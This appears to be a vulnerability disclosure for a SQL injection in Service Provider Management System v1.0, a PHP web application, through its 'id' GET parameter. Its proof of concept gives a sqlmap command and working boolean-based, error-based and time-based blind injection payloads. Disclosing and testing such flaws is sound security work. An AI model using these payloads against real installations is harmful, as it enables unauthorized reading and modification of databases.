Service provider management system v1.0 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-05-24 |
Type : webapps |
Platform : php
This exploit / vulnerability Service provider management system v1.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
Service Provider Management System v1.0 allows SQL Injection via ID
parameter in /php-spms/?page=services/view&id=2
Exploiting this issue could allow an attacker to compromise the
application, access or modify data,
or exploit the latest vulnerabilities in the underlying database.
Endpoint: /php-spms/?page=services/view&id=2
Vulnerable parameter: id (GET)
2. Proof of Concept:
----------------------
Step 1 - By visiting the url:
http://localhost/php-spms/?page=services/view&id=2 just add single quote to
verify the SQL Injection.
Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
-p id --dbms=mysql
SQLMap Response:
----------------------
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
COUNT(*),CONCAT(0x7178717171,(SELECT
(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=services/view&id=1' AND (SELECT 1072 FROM
(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
Service provider management system v1.0 sql injection